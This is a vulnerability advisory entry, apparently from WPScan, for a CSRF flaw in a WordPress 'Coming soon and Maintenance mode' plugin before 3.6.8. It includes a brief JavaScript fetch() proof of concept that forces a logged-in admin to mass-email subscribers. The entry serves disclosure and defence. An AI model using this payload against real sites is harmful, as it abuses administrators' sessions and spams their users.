Lucene search

K
wpvulndbKrzysztof ZającWPVDB-ID:1AB1748F-C939-4953-83FC-9DF878DA7714
HistoryJan 24, 2022 - 12:00 a.m.

Coming soon and Maintenance mode < 3.6.8 - Arbitrary Email Sending to Subscribed Users via CSRF

2022-01-2400:00:00
Krzysztof Zając
wpscan.com
6

0.001 Low

EPSS

Percentile

30.2%

The plugin does not have CSRF check in its coming_soon_send_mail AJAX action, allowing attackers to make logged in admin to send arbitrary emails to all subscribed users via a CSRF attack

PoC

fetch(“https://example.com/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: “action=coming_soon_send_mail&massage;_title=title&massage;_description=description&massage;_from_name=from&massage;[email protected]”, “method”: “POST”, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data));

CPENameOperatorVersion
coming-soon-pagelt3.6.8

0.001 Low

EPSS

Percentile

30.2%

Related for WPVDB-ID:1AB1748F-C939-4953-83FC-9DF878DA7714